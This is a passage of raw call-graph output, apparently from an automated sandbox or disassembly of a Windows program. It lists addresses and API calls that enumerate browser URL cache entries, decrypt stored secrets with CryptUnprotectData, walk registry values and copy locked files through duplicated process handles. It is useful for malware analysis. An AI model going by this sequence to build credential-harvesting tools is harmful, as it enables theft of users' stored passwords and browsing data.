38889->39529 38890->38889 38891->38434 38893 40aebe FindClose 38892->38893 38894 40ae21 38893->38894 38895 4099c6 2 API calls 38894->38895 38896 40ae35 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 40ae49 38897->38898 38898->38474 38900 40ade0 38899->38900 38901 40ae0f 38899->38901 38900->38901 38902 40ade7 wcscmp 38900->38902 38901->38474 38902->38901 38903 40adfe wcscmp 38902->38903 38903->38901 38905 40ae7b FindNextFileW 38904->38905 38906 40ae5c FindFirstFileW 38904->38906 38907 40ae94 38905->38907 38908 40ae8f 38905->38908 38906->38907 38909 409d1f 6 API calls 38907->38909 38911 40aeb6 38907->38911 38910 40aebe FindClose 38908->38910 38909->38911 38910->38907 38911->38474 38913 40aed1 38912->38913 38914 40aec7 FindClose 38912->38914 38913->38488 38914->38913 38916 4099d7 38915->38916 38917 4099da memcpy 38915->38917 38916->38917 38917->38418 38919 40b2cc 27 API calls 38918->38919 38920 44543f 38919->38920 38921 409d1f 6 API calls 38920->38921 38922 44544f 38921->38922 39893 409b98 GetFileAttributesW 38922->39893 38924 44545e 38925 445476 38924->38925 38926 40b6ef 253 API calls 38924->38926 38927 40b2cc 27 API calls 38925->38927 38926->38925 38928 445482 38927->38928 38929 409d1f 6 API calls 38928->38929 38930 445492 38929->38930 39894 409b98 GetFileAttributesW 38930->39894 38932 4454a1 38933 4454b9 38932->38933 38934 40b6ef 253 API calls 38932->38934 38933->38447 38934->38933 38935->38446 38936->38464 38937->38471 38938->38509 38939->38491 38940->38536 38941->38536 38942->38518 38943->38547 38944->38549 38945->38551 38947 414c2e 17 API calls 38946->38947 38948 40c2ae 38947->38948 39004 40c1d3 38948->39004 38953 40c3be 38970 40a8ab 38953->38970 38954 40afcf 2 API calls 38955 40c2fd FindFirstUrlCacheEntryW 38954->38955 38956 40c3b6 38955->38956 38957 40c31e wcschr 38955->38957 38958 40b04b ??3@YAXPAX 38956->38958 38959 40c331 38957->38959 38960 40c35e FindNextUrlCacheEntryW 38957->38960 38958->38953 38961 40a8ab 9 API calls 38959->38961 38960->38957 38962 40c373 GetLastError 38960->38962 38965 40c33e wcschr 38961->38965 38963 40c3ad FindCloseUrlCache 38962->38963 38964 40c37e 38962->38964 38963->38956 38966 40afcf 2 API calls 38964->38966 38965->38960 38967 40c34f 38965->38967 38968 40c391 FindNextUrlCacheEntryW 38966->38968 38969 40a8ab 9 API calls 38967->38969 38968->38957 38968->38963 38969->38960 39098 40a97a 38970->39098 38973 40a8cc 38973->38558 39104 40b1ab free free 38975->39104 38977 40c3dd 38978 40b2cc 27 API calls 38977->38978 38979 40c3e7 38978->38979 39105 414592 RegOpenKeyExW 38979->39105 38981 40c3f4 38982 40c50e 38981->38982 38983 40c3ff 38981->38983 38997 405337 38982->38997 38984 40a9ce 4 API calls 38983->38984 38985 40c418 memset 38984->38985 39106 40aa1d 38985->39106 38988 40c471 38990 40c47a _wcsupr 38988->38990 38989 40c505 RegCloseKey 38989->38982 39108 40a8d0 7 API calls 38990->39108 38992 40c498 39109 40a8d0 7 API calls 38992->39109 38994 40c4ac memset 38995 40aa1d 38994->38995 38996 40c4e4 RegEnumValueW 38995->38996 38996->38989 38996->38990 39110 405220 38997->39110 39000->38570 39001->38572 39002->38568 39003->38565 39005 40ae18 9 API calls 39004->39005 39011 40c210 39005->39011 39006 40ae51 9 API calls 39006->39011 39007 40c264 39008 40aebe FindClose 39007->39008 39010 40c26f 39008->39010 39009 40add4 2 API calls 39009->39011 39016 40e5ed memset memset 39010->39016 39011->39006 39011->39007 39011->39009 39012 40c231 _wcsicmp 39011->39012 39013 40c1d3 35 API calls 39011->39013 39012->39011 39014 40c248 39012->39014 39013->39011 39029 40c084 22 API calls 39014->39029 39017 414c2e 17 API calls 39016->39017 39018 40e63f 39017->39018 39019 409d1f 6 API calls 39018->39019 39020 40e658 39019->39020 39030 409b98 GetFileAttributesW 39020->39030 39022 40e667 39023 40e680 39022->39023 39025 409d1f 6 API calls 39022->39025 39031 409b98 GetFileAttributesW 39023->39031 39025->39023 39026 40e68f 39027 40c2d8 39026->39027 39032 40e4b2 39026->39032 39027->38953 39027->38954 39029->39011 39030->39022 39031->39026 39053 40e01e 39032->39053 39034 40e593 39036 40e5b0 39034->39036 39037 40e59c DeleteFileW 39034->39037 39035 40e521 39035->39034 39076 40e175 39035->39076 39038 40b04b ??3@YAXPAX 39036->39038 39037->39036 39039 40e5bb 39038->39039 39041 40e5c4 CloseHandle 39039->39041 39042 40e5cc 39039->39042 39041->39042 39044 40b633 free 39042->39044 39043 40e573 39046 40e584 39043->39046 39047 40e57c CloseHandle 39043->39047 39045 40e5db 39044->39045 39050 40b633 free 39045->39050 39097 40b1ab free free 39046->39097 39047->39046 39049 40e540 39049->39043 39096 40e2ab 30 API calls 39049->39096 39051 40e5e3 39050->39051 39051->39027 39054 406214 22 API calls 39053->39054 39055 40e03c 39054->39055 39056 40e16b 39055->39056 39057 40dd85 75 API calls 39055->39057 39056->39035 39058 40e06b 39057->39058 39058->39056 39059 40afcf ??2@YAPAXI ??3@YAXPAX 39058->39059 39060 40e08d OpenProcess 39059->39060 39061 40e0a4 GetCurrentProcess DuplicateHandle 39060->39061 39065 40e152 39060->39065 39062 40e0d0 GetFileSize 39061->39062 39063 40e14a CloseHandle 39061->39063 39066 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39062->39066 39063->39065 39064 40e160 39068 40b04b ??3@YAXPAX 39064->39068 39065->39064 39067 406214 22 API calls 39065->39067 39069 40e0ea 39066->39069 39067->39064 39068->39056 39070 4096dc CreateFileW 39069->39070 39071 40e0f1 CreateFileMappingW 39070->39071 39072 40e140 CloseHandle CloseHandle 39071->39072 39073 40e10b MapViewOfFile 39071->39073 39072->39063 39074 40e13b CloseHandle 39073->39074 39075 40e11f WriteFile UnmapViewOfFile 39073->39075 39074->39072 39075->39074 39077 40e18c 39076->39077 39078 406b90 11 API calls 39077->39078 39079 40e19f 39078->39079 39080 40e1a7 memset 39079->39080 39081 40e299 39079->39081 39086 40e1e8 39080->39086 39082 4069a3 ??3@YAXPAX free 39081->39082 39083 40e2a4 39082->39083 39083->39049 39084 406e8f 13 API calls 39084->39086 39085 406b53 SetFilePointerEx ReadFile 39085->39086 39086->39084 39086->39085 39087 40e283 39086->39087 39088 40dd50 _wcsicmp 39086->39088 39092 40742e 8 API calls 39086->39092 39093 40aae3 wcslen wcslen _memicmp 39086->39093 39094 40e244 _snwprintf 39086->39094 39089 40e291 39087->39089 39090 40e288 free 39087->39090 39088->39086 39091 40aa04 free 39089->39091 39090->39089 39091->39081 39092->39086 39093->39086 39095 40a8d0 7 API calls 39094->39095 39095->39086 39096->39049 39097->39034 39100 40a980 39098->39100 39099 40a8bb 39099->38973 39103 40a8d0 7 API calls 39099->39103 39100->39099 39101 40a995 _wcsicmp 39100->39101 39102 40a99c wcscmp 39100->39102 39101->39100 39102->39100 39103->38973 39104->38977 39105->38981 39107 40aa23 RegEnumValueW 39106->39107 39107->38988 39107->38989 39108->38992 39109->38994 39111 405335 39110->39111 39112 40522a 39110->39112 39111->38568 39113 40b2cc 27 API calls 39112->39113 39114 405234 39113->39114 39115 40a804 8 API calls 39114->39115 39116 40523a 39115->39116 39155 40b273 39116->39155 39118 405248 _mbscpy _mbscat GetProcAddress 39119 40b273 27 API calls 39118->39119 39120 405279 39119->39120 39158 405211 GetProcAddress 39120->39158 39122 405282 39123 40b273 27 API calls 39122->39123 39124 40528f 39123->39124 39159 405211 GetProcAddress 39124->39159 39126 405298 39127 40b273 27 API calls 39126->39127 39128 4052a5 39127->39128 39160 405211 GetProcAddress 39128->39160 39130 4052ae 39131 40b273 27 API calls 39130->39131 39132 4052bb 39131->39132 39161 405211 GetProcAddress 39132->39161 39134 4052c4 39135 40b273 27 API calls 39134->39135 39136 4052d1 39135->39136 39162 405211 GetProcAddress 39136->39162 39138 4052da 39139 40b273 27 API calls 39138->39139 39140 4052e7 39139->39140 39163 405211 GetProcAddress 39140->39163 39156 40b58d 27 API calls 39155->39156 39157 40b18c 39156->39157 39157->39118 39158->39122 39159->39126 39160->39130 39161->39134 39162->39138 39168 40440c FreeLibrary 39167->39168 39169 40436d 39168->39169 39170 40a804 8 API calls 39169->39170 39171 404377 39170->39171 39172 404383 39171->39172 39173 404405 39171->39173 39174 40b273 27 API calls 39172->39174 39173->38576 39173->38580 39175 40438d GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043a7 GetProcAddress 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043ba GetProcAddress 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4043ce GetProcAddress 39180->39181 39182 40b273 27 API calls 39181->39182 39183 4043e2 GetProcAddress 39182->39183 39184 4043f1 39183->39184 39185 4043f7 39184->39185 39186 40440c FreeLibrary 39184->39186 39185->39173 39186->39173 39188 404413 FreeLibrary 39187->39188 39189 40441e 39187->39189 39188->39189 39189->38592 39190->38583 39192 40447e 39191->39192 39193 40442e 39191->39193 39194 404485 CryptUnprotectData 39192->39194 39195 40449c 39192->39195 39196 40b2cc 27 API calls 39193->39196 39194->39195 39195->38583 39197 404438 39196->39197 39198 40a804 8 API calls 39197->39198 39199 40443e 39198->39199 39200 404445 39199->39200 39201 404467 39199->39201 39202 40b273 27 API calls 39200->39202 39201->39192 39203 404475 FreeLibrary 39201->39203 39204 40444f GetProcAddress 39202->39204 39203->39192 39204->39201 39205 404460 39204->39205 39205->39201 39207 4135f6 39206->39207 39208 4135eb FreeLibrary 39206->39208 39207->38595 39208->39207 39210 4449c4 39209->39210 39211 444a52 39209->39211 39212 40b2cc 27 API calls 39210->39212 39211->38615 39211->38616 39213 4449cb 39212->39213 39214 40a804 8 API calls 39213->39214 39236 403a29 39235->39236 39250 403bed memset memset 39236->39250 39238 403ae7 39263 40b1ab free free 39238->39263 39239 403a3f memset 39245 403a2f 39239->39245 39241 403aef 39241->38633 39242 409b98 GetFileAttributesW 39242->39245 39243 40a8d0 7 API calls 39243->39245 39244 409d1f 6 API calls 39244->39245 39245->39238 39245->39239 39245->39242 39245->39243 39245->39244 39247 40a051 GetFileTime CloseHandle 39246->39247 39248 4039ca CompareFileTime 39246->39248 39247->39248 39248->38633 39249->38634 39251 414c2e 17 API calls 39250->39251 39252 403c38 39251->39252 39253 409719 2 API calls 39252->39253 39254 403c3f wcscat 39253->39254 39255 414c2e 17 API calls 39254->39255 39256 403c61 39255->39256 39257 409719 2 API calls 39256->39257 39258 403c68 wcscat 39257->39258 39264 403af5 39258->39264 39261 403af5 20 API calls 39262 403c95 39261->39262 39262->39245 39263->39241 39265 403b02 39264->39265 39266 40ae18 9 API calls 39265->39266 39274 403b37 39266->39274 39267 403bdb 39269 40aebe FindClose 39267->39269 39268 40add4 wcscmp wcscmp 39268->39274 39270 403be6 39269->39270 39270->39261 39271 40ae18 9 API calls 39271->39274 39272 40ae51 9 API calls 39272->39274 39273 40aebe FindClose 39273->39274 39274->39267 39274->39268 39274->39271 39274->39272 39274->39273 39275 40a8d0 7 API calls 39274->39275 39275->39274 39277 409d1f 6 API calls 39276->39277 39278 404190 39277->39278 39291 409b98 GetFileAttributesW 39278->39291 39280 40419c 39281 4041a7 6 API calls 39280->39281 39282 40435c 39280->39282 39283 40424f 39281->39283 39282->38660 39283->39282 39285 40425e memset 39283->39285 39287 409d1f 6 API calls 39283->39287 39288 40a8ab 9 API calls 39283->39288 39292 414842 39283->39292 39285->39283 39286 404296 wcscpy 39285->39286 39286->39283 39287->39283 39289 4042b6 memset memset _snwprintf wcscpy 39288->39289 39289->39283 39290->38658 39291->39280 39295 41443e 39292->39295 39294 414866 39294->39283 39296 41444b 39295->39296 39297 414451 39296->39297 39298 4144a3 GetPrivateProfileStringW 39296->39298 39299 414491 39297->39299 39300 414455 wcschr 39297->39300 39298->39294 39302 414495 WritePrivateProfileStringW 39299->39302 39300->39299 39301 414463 _snwprintf 39300->39301 39301->39302 39302->39294 39303->38664 39305 40b2cc 27 API calls 39304->39305 39306 409615 39305->39306 39307 409d1f 6 API calls 39306->39307 39308 409625 39307->39308 39331 409b98 GetFileAttributesW 39308->39331 39310 409634 39311 409648 39310->39311 39348 4091b8 241 API calls 39310->39348 39313 40b2cc 27 API calls 39311->39313 39315 408801 39311->39315 39314 40965d 39313->39314 39316 409d1f 6 API calls 39314->39316 39315->38667 39315->38668 39317 40966d 39316->39317 39332 409b98 GetFileAttributesW 39317->39332 39319 40967c 39319->39315 39333 409529 39319->39333 39331->39310 39332->39319 39349 4096c3 CreateFileW 39333->39349 39335 409543 39336 409550 GetFileSize 39335->39336 39347 4095cd 39335->39347 39347->39315 39348->39311 39349->39335 39380 413f4f 39353->39380 39356 413f37 K32GetModuleFileNameExW 39357 413f4a 39356->39357 39357->38722 39359 413969 wcscpy 39358->39359 39360 41396c wcschr 39358->39360 39371 413a3a 39359->39371 39360->39359 39362 41398e 39360->39362 39385 4097f7 wcslen wcslen _memicmp 39362->39385 39364 41399a 39365 4139a4 memset 39364->39365 39366 4139e6 39364->39366 39386 409dd5 GetWindowsDirectoryW wcscpy 39365->39386 39367 413a31 wcscpy 39366->39367 39368 4139ec memset 39366->39368 39367->39371 39387 409dd5 GetWindowsDirectoryW wcscpy 39368->39387 39371->38722 39372 4139c9 wcscpy wcscat 39372->39371 39373 413a11 memcpy wcscat 39373->39371 39375 413cb0 GetModuleHandleW 39374->39375 39376 413cda 39374->39376 39375->39376 39377 413cbf GetProcAddress 39375->39377 39378 413ce3 GetProcessTimes 39376->39378 39379 413cf6 39376->39379 39377->39376 39378->38730 39379->38730 39381 413f2f 39380->39381 39382 413f54 39380->39382 39381->39356 39381->39357 39383 40a804 8 API calls 39382->39383 39384 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39383->39384 39384->39381 39385->39364 39386->39372 39387->39373 39388->38751 39389->38774 39391 409cf9 GetVersionExW 39390->39391 39392 409d0a 39390->39392 39391->39392 39392->38780 39392->38785 39393->38787 39394->38790 39395->38792 39396->38837 39398 40bba5 39397->39398 39532 40cc26 39398->39532 39401 40bd4b 39553 40cc0c 39401->39553 39406 40b2cc 27 API calls 39407 40bbef 39406->39407 39560 40ccf0 _wcsicmp 39407->39560 39409 40bbf5 39409->39401 39561 40ccb4 6 API calls 39409->39561 39411 40bc26 39412 40cf04 17 API calls 39411->39412 39413 40bc2e 39412->39413 39414 40bd43 39413->39414 39415 40b2cc 27 API calls 39413->39415 39416 40cc0c 4 API calls 39414->39416 39417 40bc40 39415->39417 39416->39401 39562 40ccf0 _wcsicmp 39417->39562 39419 40bc46 39419->39414 39420 40bc61 memset memset WideCharToMultiByte 39419->39420 39563 40103c strlen 39420->39563 39422 40bcc0 39423 40b273 27 API calls 39422->39423 39424 40bcd0 memcmp 39423->39424 39424->39414 39425 40bce2 39424->39425 39426 404423 38 API calls 39425->39426 39427 40bd10 39426->39427 39427->39414 39428 40bd3a LocalFree 39427->39428 39429 40bd1f memcpy 39427->39429 39428->39414 39429->39428 39430->38852 39432 4438b5 11 API calls 39431->39432 39433 44444c 39432->39433 39439 40b879 39433->39439 39620 415a6d 39433->39620 39436 444486 39438 4444b9 memcpy 39436->39438 39476 4444a4 39436->39476 39437 44469e 39437->39439 39441 443d90 111 API calls 39437->39441 39624 415258 39438->39624 39439->38855 39439->38856 39441->39439 39442 444524 39443 444541 39442->39443 39444 44452a 39442->39444 39627 444316 39443->39627 39661 416935 39444->39661 39448 444316 18 API calls 39449 444563 39448->39449 39450 444316 18 API calls 39449->39450 39451 44456f 39450->39451 39452 444316 18 API calls 39451->39452 39453 44457f 39452->39453 39453->39476 39641 432d4e 39453->39641 39456 444316 18 API calls 39457 4445b0 39456->39457 39645 41eed2 39457->39645 39459 4445cf 39460 4445d6 39459->39460 39461 4445ee 39459->39461 39463 416935 16 API calls 39460->39463 39669 43302c memset 39461->39669 39463->39476 39464 4445fa 39670 43302c memset 39464->39670 39674 4442e6 11 API calls 39476->39674 39719 438460 39477->39719 39479 40b8a4 39479->38864 39503 4251c4 39479->39503 39481 443da3 39480->39481 39482 443db6 39480->39482 39813 41707a 11 API calls 39481->39813 39482->38855 39484 443da8 39485 443dbc 39484->39485 39486 443dac 39484->39486 39815 4300e8 memset memset memcpy 39485->39815 39814 4446ea 11 API calls 39486->39814 39489 443dce 39490 443de0 39489->39490 39495 443e22 39489->39495 39491 416935 16 API calls 39490->39491 39491->39482 39492 443e5a 39817 4300e8 memset memset memcpy 39492->39817 39495->39492 39816 41f0ac 103 API calls 39495->39816 39496 443e63 39497 416935 16 API calls 39496->39497 39498 443f3b 39497->39498 39498->39482 39818 42320f memset memcpy 39498->39818 39501 409a74 GetTempFileNameW 39500->39501 39502 409a66 GetWindowsDirectoryW 39500->39502 39501->38850 39502->39501 39819 424f07 39503->39819 39505 4251e4 39506 4251f7 39505->39506 39507 4251e8 39505->39507 39827 4250f8 39506->39827 39826 4446ea 11 API calls 39507->39826 39509 4251f2 39509->38889 39511 425209 39514 425249 39511->39514 39517 4250f8 127 API calls 39511->39517 39518 425287 39511->39518 39835 4384e9 135 API calls 39511->39835 39836 424f74 124 API calls 39511->39836 39514->39518 39837 424ff0 13 API calls 39514->39837 39517->39511 39839 415c7d 16 API calls 39518->39839 39519 425266 39519->39518 39838 415be9 memcpy 39519->39838 39521->38889 39522->38889 39523->38889 39524->38889 39525->38889 39526->38889 39527->38889 39528->38889 39529->38889 39530->38864 39531->38886 39564 4096c3 CreateFileW 39532->39564 39534 40cc34 39535 40cc3d GetFileSize 39534->39535 39543 40bbca 39534->39543 39536 40afcf 2 API calls 39535->39536 39537 40cc64 39536->39537 39565 40a2ef ReadFile 39537->39565 39539 40cc71 39566 40ab4a MultiByteToWideChar 39539->39566 39541 40cc95 CloseHandle 39542 40b04b ??3@YAXPAX 39541->39542 39542->39543 39543->39401 39544 40cf04 39543->39544 39545 40b633 free 39544->39545 39546 40cf14 39545->39546 39572 40b1ab free free 39546->39572 39548 40bbdd 39548->39401 39548->39406 39549 40cf1b 39549->39548 39551 40cfef 39549->39551 39573 40cd4b 39549->39573 39552 40cd4b 14 API calls 39551->39552 39552->39548 39554 40b633 free 39553->39554 39555 40cc15 39554->39555 39556 40aa04 free 39555->39556 39557 40cc1d 39556->39557 39619 40b1ab free free 39557->39619 39559 40b7d4 memset CreateFileW 39559->38844 39559->38845 39560->39409 39561->39411 39562->39419 39563->39422 39564->39534 39565->39539 39567 40ab93 39566->39567 39568 40ab6b 39566->39568 39567->39541 39569 40a9ce 4 API calls 39568->39569 39570 40ab74 39569->39570 39571 40ab7c MultiByteToWideChar 39570->39571 39571->39567 39572->39549 39574 40cd7b 39573->39574 39607 40aa29 6 API calls 39574->39607 39576 40cef5 39577 40aa04 free 39576->39577 39578 40cefd 39577->39578 39578->39549 39579 40cd89 39579->39576 39608 40aa29 6 API calls 39579->39608 39581 40ce1d 39609 40aa29 6 API calls 39581->39609 39583 40ce3e 39584 40ce6a 39583->39584 39610 40abb7 wcslen memmove 39583->39610 39585 40ce9f 39584->39585 39613 40abb7 wcslen memmove 39584->39613 39616 40a8d0 7 API calls 39585->39616 39588 40ce56 39611 40aa71 wcslen 39588->39611 39590 40ceb5 39617 40a8d0 7 API calls 39590->39617 39592 40ce8b 39614 40aa71 wcslen 39592->39614 39593 40ce5e 39612 40abb7 wcslen memmove 39593->39612 39597 40ce93 39615 40abb7 wcslen memmove 39597->39615 39598 40cecb 39618 40d00b malloc memcpy free free 39598->39618 39601 40cedd 39602 40aa04 free 39601->39602 39603 40cee5 39602->39603 39604 40aa04 free 39603->39604 39605 40ceed 39604->39605 39606 40aa04 free 39605->39606 39606->39576 39607->39579 39608->39581 39609->39583 39610->39588 39611->39593 39612->39584 39613->39592 39614->39597 39615->39585 39616->39590 39617->39598 39618->39601 39619->39559 39621 415a77 39620->39621 39622 415a8d 39621->39622 39623 415a7e memset 39621->39623 39622->39436 39623->39622 39625 4438b5 11 API calls 39624->39625 39626 41525d 39625->39626 39626->39442 39628 444328 39627->39628 39629 444423 39628->39629 39630 44434e 39628->39630 39675 4446ea 11 API calls 39629->39675 39632 432d4e 3 API calls 39630->39632 39633 44435a 39632->39633 39635 444375 39633->39635 39640 44438b 39633->39640 39634 432d4e 3 API calls 39636 4443ec 39634->39636 39637 416935 16 API calls 39635->39637 39638 444381 39636->39638 39639 416935 16 API calls 39636->39639 39637->39638 39638->39448 39639->39638 39640->39634 39642 432d65 39641->39642 39643 432d58 39641->39643 39642->39456 39676 432cc4 memset memset memcpy 39643->39676 39646 41eee2 39645->39646 39647 415a6d memset 39646->39647 39648 41ef23 39647->39648 39649 415a6d memset 39648->39649 39653 41ef2d 39648->39653 39650 41ef42 39649->39650 39654 41ef49 39650->39654 39677 41b7d9 39650->39677 39653->39459 39654->39653 39692 41b321 101 API calls 39654->39692 39662 41693e 39661->39662 39668 41698e 39661->39668 39663 41694c 39662->39663 39698 422fd1 memset 39662->39698 39663->39668 39699 4165a0 39663->39699 39668->39476 39669->39464 39674->39437 39675->39638 39676->39642 39683 41b812 39677->39683 39678 415a6d memset 39686 41b884 39683->39686 39689 41b849 39683->39689 39693 444706 11 API calls 39683->39693 39686->39678 39686->39689 39692->39653 39693->39686 39698->39663 39705 415cfe 39699->39705 39704 422b84 15 API calls 39704->39668 39710 415d23 __aullrem __aulldvrm 39705->39710 39712 41628e 39705->39712 39706 4163ca 39707 416422 10 API calls 39706->39707 39707->39712 39708 416422 10 API calls 39708->39710 39709 416172 memset 39709->39710 39710->39706 39710->39708 39710->39709 39711 415cb9 10 API calls 39710->39711 39710->39712 39711->39710 39713 416520 39712->39713 39714 416527 39713->39714 39718 416574 39713->39718 39715 416544 39714->39715 39716 415700 10 API calls 39714->39716 39714->39718 39717 416561 memcpy 39715->39717 39715->39718 39716->39715 39717->39718 39718->39668 39718->39704 39731 41703f 39719->39731 39721 43847a 39722 43848a 39721->39722 39723 43847e 39721->39723 39738 438270 39722->39738 39768 4446ea 11 API calls 39723->39768 39727 438488 39727->39479 39729 4384bb 39730 438270 134 API calls 39729->39730 39730->39727 39732 417044 39731->39732 39733 41705c 39731->39733 39737 417055 39732->39737 39770 416760 11 API calls 39732->39770 39734 417075 39733->39734 39771 41707a 11 API calls 39733->39771 39734->39721 39737->39721 39772 415a91 39738->39772 39740 43828d 39741 438297 39740->39741 39742 438341 39740->39742 39744 4382d6 39740->39744 39812 415c7d 16 API calls 39741->39812 39776 44358f 39742->39776 39747 4382fb 39744->39747 39748 4382db 39744->39748 39746 438458 39746->39727 39769 424f26 123 API calls 39746->39769 39808 415c23 memcpy 39747->39808 39750 416935 16 API calls 39748->39750 39752 4382e9 39750->39752 39751 438305 39755 44358f 19 API calls 39751->39755 39757 438318 39751->39757 39807 415c7d 16 API calls 39752->39807 39754 438373 39761 438383 39754->39761 39809 4300e8 memset memset memcpy 39754->39809 39755->39757 39757->39754 39802 43819e 39757->39802 39759 4383f5 39764 438404 39759->39764 39765 43841c 39759->39765 39760 4383cd 39760->39759 39811 42453e 123 API calls 39760->39811 39761->39760 39810 415c23 memcpy 39761->39810 39767 416935 16 API calls 39764->39767 39766 416935 16 API calls 39765->39766 39766->39741 39767->39741 39768->39727 39769->39729 39770->39737 39771->39732 39773 415a9d 39772->39773 39774 415ab3 39773->39774 39775 415aa4 memset 39773->39775 39774->39740 39775->39774 39777 4435be 39776->39777 39778 443676 39777->39778 39783 442ff8 19 API calls 39777->39783 39785 4436ce 39777->39785 39786 44366c 39777->39786 39800 44360c 39777->39800 39779 443758 39778->39779 39781 442ff8 19 API calls 39778->39781 39784 443737 39778->39784 39780 441409 memset 39779->39780 39791 443775 39779->39791 39780->39779 39781->39784 39782 442ff8 19 API calls 39782->39779 39783->39777 39784->39782 39788 4165ff 11 API calls 39785->39788 39789 4169a7 11 API calls 39786->39789 39787 4437be 39790 416760 11 API calls 39787->39790 39792 4437de 39787->39792 39788->39778 39789->39778 39790->39792 39791->39787 39796 415c56 11 API calls 39791->39796 39793 42463b memset memcpy 39792->39793 39795 443801 39792->39795 39793->39795 39794 443826 39797 43bd08 memset 39794->39797 39795->39794 39798 43024d memset 39795->39798 39796->39787 39799 443837 39797->39799 39798->39794 39799->39800 39801 43024d memset 39799->39801 39800->39757 39801->39799 39803 438246 39802->39803 39805 4381ba 39802->39805 39803->39754 39804 41f432 110 API calls 39804->39805 39805->39803 39805->39804 39806 41f638 104 API calls 39805->39806 39806->39805 39807->39741 39808->39751 39809->39761 39810->39760 39811->39759 39812->39746 39813->39484 39814->39482 39815->39489 39816->39495 39817->39496 39818->39482 39820 424f1f 39819->39820 39821 424f0c 39819->39821 39841 424eea 11 API calls 39820->39841 39840 416760 11 API calls 39821->39840 39824 424f18 39824->39505 39825 424f24 39825->39505 39826->39509 39828 425108 39827->39828 39834 42510d 39827->39834 39874 424f74 124 API calls 39828->39874 39831 42516e 39875 415c7d 16 API calls 39831->39875 39832 425115 39832->39511 39834->39832 39842 42569b 39834->39842 39835->39511 39836->39511 39837->39519 39838->39518 39839->39509 39840->39824 39841->39825 39843 4256f1 39842->39843 39870 4259c2 39842->39870 39849 4259da 39843->39849 39853 422aeb memset memcpy memcpy 39843->39853 39854 429a4d 39843->39854 39859 4260a1 39843->39859 39868 429ac1 39843->39868 39843->39870 39873 425a38 39843->39873 39876 4227f0 memset memcpy 39843->39876 39877 422b84 15 API calls 39843->39877 39878 422b5d memset memcpy memcpy 39843->39878 39879 422640 13 API calls 39843->39879 39881 4241fc 11 API calls 39843->39881 39882 42413a 90 API calls 39843->39882 39848 4260dd 39887 424251 120 API calls 39848->39887 39886 416760 11 API calls 39849->39886 39853->39843 39855 429a66 39854->39855 39856 429a9b 39854->39856 39888 415c56 11 API calls 39855->39888 39860 429a96 39856->39860 39890 416760 11 API calls 39856->39890 39885 415c56 11 API calls 39859->39885 39891 424251 120 API calls 39860->39891 39862 429a7a 39889 416760 11 API calls 39862->39889 39869 425ad6 39868->39869 39892 415c56 11 API calls 39868->39892 39869->39831 39870->39869 39880 415c56 11 API calls 39870->39880 39873->39870 39883 422640 13 API calls 39873->39883 39884 4226e0 12 API calls 39873->39884 39874->39834 39875->39832 39876->39843 39877->39843 39878->39843 39879->39843 39880->39849 39881->39843 39882->39843 39883->39873 39884->39873 39885->39849 39886->39848 39887->39869 39888->39862 39889->39860 39890->39860 39891->39868 39892->39849 39893->38924 39894->38932 39904 44def7 39905 44df07 39904->39905 39906 44df00 ??3@YAXPAX 39904->39906 39907 44df17 39905->39907 39908 44df10 ??3@YAXPAX 39905->39908 39906->39905 39909 44df27 39907->39909 39910 44df20 ??3@YAXPAX 39907->39910 39908->39907 39911 44df37 39909->39911 39912 44df30 ??3@YAXPAX 39909->39912 39910->39909 39912->39911 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39913 4148b6 FindResourceW 39914 4148cf SizeofResource 39913->39914 39917 4148f9 39913->39917 39915 4148e0 LoadResource 39914->39915 39914->39917 39916 4148ee LockResource 39915->39916 39915->39917 39916->39917 37847 415304 free 39918 441b3f 39928 43a9f6 39918->39928 39920 441b61 40101 4386af memset 39920->40101 39922 44189a 39923 4418e2 39922->39923 39927 442bd4 39922->39927 39924 4418ea 39923->39924 40102 4414a9 12 API calls 39923->40102 39927->39924 40103 441409 memset 39927->40103 39929 43aa20 39928->39929 39930 43aadf 39928->39930 39929->39930 39931 43aa34 memset 39929->39931 39930->39920 39932 43aa56 39931->39932 39933 43aa4d 39931->39933 40104 43a6e7 39932->40104 40112 42c02e memset 39933->40112 39938 43aad3 40114 4169a7 11 API calls 39938->40114 39939 43aaae 39939->39930 39939->39938 39954 43aae5 39939->39954 39940 43ac18 39943 43ac47 39940->39943 40116 42bbd5 memcpy memcpy memcpy memset memcpy 39940->40116 39944 43aca8 39943->39944 40117 438eed 16 API calls 39943->40117 39947 43acd5 39944->39947 40119 4233ae 11 API calls 39944->40119 40120 423426 11 API calls 39947->40120 39948 43ac87 40118 4233c5 16 API calls 39948->40118 39952 43ace1 40121 439811 163 API calls 39952->40121 39953 43a9f6 161 API calls 39953->39954 39954->39930 39954->39940 39954->39953 40115 439bbb 22 API calls 39954->40115 39956 43acfd 39962 43ad2c 39956->39962 40122 438eed 16 API calls 39956->40122 39958 43ad19 40123 4233c5 16 API calls 39958->40123 39959 43ad58 40124 44081d 163 API calls 39959->40124 39962->39959 39965 43add9 39962->39965 39964 43ae3a memset 39966 43ae73 39964->39966 39965->39965 40128 423426 11 API calls 39965->40128 40129 42e1c0 147 API calls 39966->40129 39967 43adab 40126 438c4e 163 API calls 39967->40126 39970 43ad6c 39970->39930 39970->39967 40125 42370b memset memcpy memset 39970->40125 39971 43adcc 40127 440f84 12 API calls 39971->40127 39972 43ae96 40130 42e1c0 147 API calls 39972->40130 39976 43aea8 39977 43aec1 39976->39977 40131 42e199 147 API calls 39976->40131 39979 43af00 39977->39979 40132 42e1c0 147 API calls 39977->40132 39979->39930 39982 43af1a 39979->39982 39983 43b3d9 39979->39983 40133 438eed 16 API calls 39982->40133 39988 43b3f6 39983->39988 39992 43b4c8 39983->39992 39985 43b60f 39985->39930 40192 4393a5 17 API calls 39985->40192 39986 43af2f 40134 4233c5 16 API calls 39986->40134 40174 432878 12 API calls 39988->40174 39990 43af51 40135 423426 11 API calls 39990->40135 39998 43b4f2 39992->39998 40180 42bbd5 memcpy memcpy memcpy memset memcpy 39992->40180 39994 43af7d 40136 423426 11 API calls 39994->40136 40181 43a76c 21 API calls 39998->40181 39999 43b529 40182 44081d 163 API calls 39999->40182 40000 43b462 40176 423330 11 API calls 40000->40176 40001 43af94 40137 423330 11 API calls 40001->40137 40005 43b47e 40009 43b497 40005->40009 40177 42374a 